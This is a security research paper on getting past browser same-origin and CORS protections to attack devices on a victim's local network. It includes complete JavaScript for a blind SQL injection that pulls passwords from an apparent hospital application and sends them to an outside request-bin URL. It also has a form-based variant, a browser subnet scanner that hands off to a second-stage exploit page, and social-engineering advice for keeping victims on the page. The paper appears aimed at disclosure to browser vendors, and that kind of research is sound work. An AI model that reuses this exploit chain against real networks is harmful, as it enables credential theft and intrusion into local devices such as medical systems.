Bypassing origin policies to exploit local network devices

Introduction

This research paper introduces some new and currently working techniques to bypass the SOP and CORS mechanisms in current browsers. This techniques can be specifically used to exploit local devices in remote networks without being directly connected to those devices. The devices do not have to be connected to the internet. The techniques were developed by Jean Pereira from CYTRES during a penetration test targeting a German hospital.

Attack surface

The attacks explained in this paper take advantage of weak SOP/CORS mechanisms in current browsers and how to use a victims browser as an attack client to exploit local network devices. But first of all, why are these mechanisms weak in the first place? Let’s have a look at the attack surface, and why those attacks are so hard to defeat on the browser side.

Images

Image elements allow a wide range of dangerous stuff, for example loading remote URIs, supporting URIs with different protocols and http versions, and receiving a callback when the resource is loaded. There is also a fallback method when an invalid resource is loaded, which is highly dangerous in terms of security. All of those features will be used in the attacks documented in this paper.

It’s difficult to harden this component because all of these features serve a legit and relevant purpose in modern web browsers. Disallowing loading images from remote URIs in general will break a huge part of the modern web, so this is not an option. The user has the full responsibility for building secure web applications.

Another dangerous feature is the ability to load any kind of data using an image element, while not relying on the same origin policy. That means loading data via image tag even works in the most scenarios where XHR or other kind of native requests is blocked by the SOP or the CORS.

The reason for this is that the image element does not send a “preflight request”, which is an additional HTTP OPTIONS request generally sent by XHR or fetch requests. By skipping the option request, the attacker has the possibility to load any resource from an arbitrary domain.

In addition, an image element does not perform any MIME type checking, which means that the resource does not even have to be an image.

This has been widely abused for XSS attacks in the past, for example to hijack the cookie of the victim, by loading an external HTTP service via image element.

In this paper we will go a step further and combine the capabilities of the image element and it’s callbacks with other dangerous functions like loading time measuring to exploit blind injection vulnerabilities.

Forms

Forms are a powerful tool for attackers because they allow sending POST request to remote domains which are out of the scope of the current domain. This gives an attacker not only advanced logging capabilities, but also the option to automatically exploit CSRF vulnerabilities by using self-submitting forms, which is simply a pre-filled form combined with a one-liner in JavaScript that submits the form.

The attacker can use an inline frame as target for the form so the attack remains hidden. If the application lacks a CSRF token, the attacker can preset any configuration value (e.g. passwords) using forms.

Also XSS vulnerabilities can easily exploited and masked using forms. The issue with forms is basically that you want to allow forms to submit data to remote URIs by default, because that is a very widespread usecase of forms in general. Blocking this feature by default in the browser will also result in breaking a huge part of the web.

While it is not possible to measure the loading time from the form submission itself, we will have a look at a little trick that can be used to still measure the loading time of the form target.

Inline frames

Inline frames are widely used to embed remote components and websites inside of a web application. That’s why it’s not really an option to block all remote frame requests by default. There were some security features introduced in the past, like the X-Frame-Options header, the CORP configuration and default security attributes for inline frames, but specifically those security attributes can be used for advanced attacks (e.g. to embed a component but prevent it from redirecting).

The ability to point to any custom resource, no matter which protocol, port or host is used can be used to fingerprint and discover local services on the victims device. We will also build a custom device scanner that scans whole subnets in a few seconds.

In the following attack scenarios we will combine the power of inline frames (which also provide a callback when the resource is loaded) with the other elements mentioned above to build strong and reliable exploit chains.

Exploitation

Time-based exploitation

In the first example we are using an image and the browser’s performance API to exploit a blind sql injection. This example has been used in a medical enviroment to attack the target and has been verified in current Safari and Chrome browsers.

First of all we are using the performance API to track the loading time of the website. After this we create a new image element and assign the fallback function when the resource is “not loaded”, which will actually mean it is loaded in our scenario because the callback is basically called once the resource is fully loaded and then assigned as “invalid image”.

The image element is being dynamically created by the function and is then referencing to the target application with the injected payload. The payload contains a time-based attack pattern which freezes the application for a few seconds if the character code at a specific position matches the character code we searched for.

We basically test all character codes between 32 and 126 for every single character in the password. If the character code matches, we proceed to check the next character. If the character code exceeds the range of 32-126, we extracted all characters from the password, as there is no other character.

As mentioned before, the image element offers a fallback event handler, which is being called when the ressource loaded by the image element is invalid or not reachable. That means an attacker can basically abuse this fallback function to load a custom resource and even get a callback after the resource is loaded.

The reason for this is that the fallback event handler is only called after the loading of the resource is finished. Instead of relying on a valid MIME header, it waits until the resource can not be reached and then calls the fallback event handler.

Once the resource has been loaded and the fallback header is called, the loading time is compared to the loading time which has been tracked before. If the difference is higher than three seconds, the function receives a confirmation that the current character does match (since the query was successfully executed) and jumps to the next character.

function crossOriginRequest() {
  const startTime = performance.now();
  const image = new Image();

  image.onerror = function () {
    const endTime = performance.now();
    const loadingTime = endTime - startTime;

    if (loadingTime.toFixed(2).split(".")[0].length > 3) {
      chars.push(targetPos);
      window.location.href = window.location.href.split("?")[0] + `?target=32&index=${index+1}&chars=${JSON.stringify(chars)}`
    } else {
      window.location.href = window.location.href.split("?")[0] + `?target=${(parseInt(targetPos)+1)}&index=${index}&chars=${JSON.stringify(chars)}`
    }
  }

  const sleep = "(LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(200000000/2)))))";
  const payload = `UNION SELECT 1,2,3,(CASE WHEN (SUBSTR(COALESCE(${column},CHAR(32)),${index},1)==CHAR(${targetPos})) THEN ${sleep} ELSE 1 END) FROM ${table}`;

  image.src = `${targetHost}-99%20${payload}%20--%20a`;
  setTimeout("window.location.reload()", 2000) // prevent browser-based request blocking
}

The character enumeration is being done by storing the current character code and the current character index in the URI. In addition there is an array of character codes which have already been extracted stored in the URI. This array resembles the final password or database value which is exploited.

If the timing attack is being executed successfully, the URI is being redirected to jump to the next character position by increasing the index value and adding the current character to the “chars” array. This runs in a loop until the last character of the password is reached.

Finally we prevent the browser from hanging by adding an automatic timeout after two seconds (this happens rarely, but it happens).

The same origin policy would usually block a behavior that intends to measure the loading time of an external web application, but by using the fallback header of the image element and then measuring the loading time of our own web application, this can be bypassed.

This scenario is using the victims browser as an exploit client to execute the malicious queries on the local system.

In the next step we are going to define a public request bin URI to store the password (also using an image element for sending a GET request to the request bin). In general this specific request could also be done by XHR since there is a server to server communication, but just in case the payload is injected and there is a unknown CORP at play, we are using an image tag for the server to server communication as well. In addition we define our target application and start to crack the password at index position one.

var index;
var chars;
var targetPos;

const targetHost = "http://10.100.50.3/medpal/";

const table = "users";
const column = "password";

const requestBin = "https://eomfmwlo9vqan97.m.pipedream.net";

var div = document.createElement("div");
div.innerHTML = "Loading attack...";
document.body.appendChild(div);

if (window.location.search.split("=")[1] == undefined) {

  setTimeout('window.location.href = window.location.href.split("?")[0] + "?target=32&index=1&chars=[]"', 1000)

} else {

  chars = JSON.parse(decodeURIComponent(window.location.search.split("chars=")[1]));
  targetPos = window.location.search.split("target=")[1].split("&")[0];
  index = parseInt(window.location.search.split("index=")[1].split("&")[0]);

  div.innerHTML = `Cracking... [i=${index}, p=${targetPos}, c="${String.fromCharCode(targetPos)}"]`;

  if (targetPos < 126) {
    crossOriginRequest();
  } else {
    const password = String.fromCharCode.apply(null, JSON.parse(decodeURIComponent(window.location.search.split("chars=")[1])));
    document.createElement("img").src = `${requestBin}?password=${password}`;
    requestAnimationFrame(() => {
      div.innerHTML = `Cracked password is: <span>${password}</span>`;
    })
  }
}

Using forms for a time based exploitation of POST requests

The trick is that we submit a form to an existing inline frame and then receive a callback from the inline frame when the request is loaded. By accessing this callback, we can then once again measure the elapsed loading time of our current website and check if our payload has been successfully executed as above.

if (window.location.search.split("=")[1] == undefined) {

  // prevent premature form submission
  (function () {
    const startTime = Date.now();
    while (Date.now() - startTime < 500) {}
  })();

  setTimeout('window.location.href = window.location.href.split("?")[0] + "?target=32&index=1&chars=[]"', 1000)

} else {

  chars = JSON.parse(decodeURIComponent(window.location.search.split("chars=")[1]));
  targetPos = window.location.search.split("target=")[1].split("&")[0];
  index = parseInt(window.location.search.split("index=")[1].split("&")[0]);

  div.innerHTML = `Cracking... [i=${index}, p=${targetPos}, c="${String.fromCharCode(targetPos)}"]`;

  if (targetPos < 126) {
    crossOriginRequest();
  } else {
    const password = String.fromCharCode.apply(null, JSON.parse(decodeURIComponent(window.location.search.split("chars=")[1])));
    document.createElement("img").src = `${requestBin}?password=${password}`;
    document.write(`Cracked password is: <span>${password}</span>`);
  }
}

var counter = 0;

function crossOriginRequest() {

  sleep = "(LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(200000000/2)))))";
  payload = `UNION SELECT 1,2,3,(CASE WHEN (SUBSTR(COALESCE(${column},CHAR(32)),${index},1)==CHAR(${targetPos})) THEN ${sleep} ELSE 1 END) FROM ${table}`

  const endTime = performance.now();
  const loadingTime = endTime - startTime;

  if (counter > 0) { // avoid calling crossOriginRequest() on iframe initialization
    if (loadingTime.toFixed(2).split(".")[0].length > 3) {
      chars.push(targetPos);
      window.location.href = window.location.href.split("?")[0] + `?target=32&index=${index+1}&chars=${JSON.stringify(chars)}`
    } else {
      window.location.href = window.location.href.split("?")[0] + `?target=${(parseInt(targetPos)+1)}&index=${index}&chars=${JSON.stringify(chars)}`
    }
  }
  counter++
}
if (targetPos < 126) {
  document.write(`
      <div style="display:none">
      <iframe id="ifr" name="ifr" onload="crossOriginRequest()"></iframe>
      <form method="POST" target="ifr" action="${targetHost}-99%20${payload}%20--%20a">
      <input type="submit">
      </form>
      </div>
    `);
  document.forms[0].submit()
}

Device scanning

The device scanning is being used to find the local IP address of the target device by using image tags to fingerprint the web application. I think that especially this part is something that browsers should take into account in terms of security, because you can basically run a full subnet scan in the web browser to find the local device by using this fingerprinting method.

The attack is abusing the victims browser to scan it’s own local network by using an arbitrary image path of the target application as fingerprinting indicator. The script is scanning all IPs from 192.168.0.0 to 192.168.255.254 and runs incredibly fast, because there is only a single indicator that has to be checked. It can also be used as portscanner, if the application runs on a custom port.

<html>
  <body>
    <div id="status-container"></div>
    <div id="ip-container"></div>

    <script>
      const ipSubnet = window.location.hash.slice(1);
      const servicePort = 80;
      const serviceFingerprint = "app_logo.png"; // arbitrary image path that exists in the target application

      var currentSubnet = parseInt(window.location.search.split("=")[1]);

      function checkStatus() {
        try {
          if(document.querySelector("iframe").contentDocument.body.innerHTML == "Loaded") {
            window.location.href = `${window.location.href.split("?")[0]}?subnet=${currentSubnet+1}`
          } else {
            setTimeout("checkStatus()", 100);
          }
        } catch(e) {
          setTimeout("checkStatus()", 100);
        }
      }

      function locateService() {
        for (let i = 0; i <= 255; i++) {
          const ipAddress = `192.168.${ipSubnet}.${i}`;
          const img = document.createElement("img");
          img.src = `http://${ipAddress}:${servicePort}/${serviceFingerprint}`;
          img.style.display = "none";
          img.onload = () => {
            parent.location.href = `https://cytres.com/second-stage.html`; // redirect to second exploit stager
          };
          document.getElementById("ip-container").appendChild(img);
          if(i == 255) {
            setTimeout('document.body.outerHTML = "Loaded"', 1000);
          }
        }
      }

      function loadSubnets() {
        const subnetFrame = document.createElement("iframe");
        subnetFrame.style.display = "none";
        subnetFrame.src = window.location.href + `#${currentSubnet}`;
        document.getElementById("ip-container").appendChild(subnetFrame);
        document.querySelector("#status-container").innerHTML = `Scanning: <span>192.168.${currentSubnet}.0/24</span>`;
      }

      if(isNaN(currentSubnet)) {
        document.querySelector("#status-container").style.display = "none";
        const subnetFrame = document.createElement("iframe");
        subnetFrame.src = window.location.href + `?subnet=0`;
        document.getElementById("ip-container").appendChild(subnetFrame);
      } else {
        if(ipSubnet.length > 0) {
          locateService();
        } else {
          loadSubnets();
          checkStatus();
        }
      }
    </script>
  </body>
</html>

The device scanner can run in the background while using social engineering to keep the user on the website. The fingerprinting requires the user to stay on the website for a timespan between a few seconds and about 20 minutes. So a smart way is using social engineering to keep the user engaged on the website.

This can be done by using a video (as demonstrated in the demo video on the CYTRES website) but also by using a PDF document, a form or survey, a chat or anything similar. An attacker would basically pick the scenario which suits the situation the best way.

After the device has been found, the user is redirected to the second exploit stager (second-stage.html). The attacker can pass the device IP as query parameter or save it in the local storage.

This allows an attacker to proceed with an arbitrary attack on the local device (XSS, CSRF, RCE, SQLi, RFI, LFI, etc.)

Conclusion

While modern browsers offer many methods to secure remote origin operations, there are still flaws that are dangerously useful for attackers to target local devices. Those are also very hard to fix since there are too many legit usecases which are still important in modern web development.

We may expect completely new ways of dealing with cross origin restrictions in near future, since the current state of the art is offering too much attack surface for hackers. This paper will be also submitted to all major browser companies to make sure they consider dealing with those kinds of attacks in future.

/Bypassing origin policies to exploit local network devices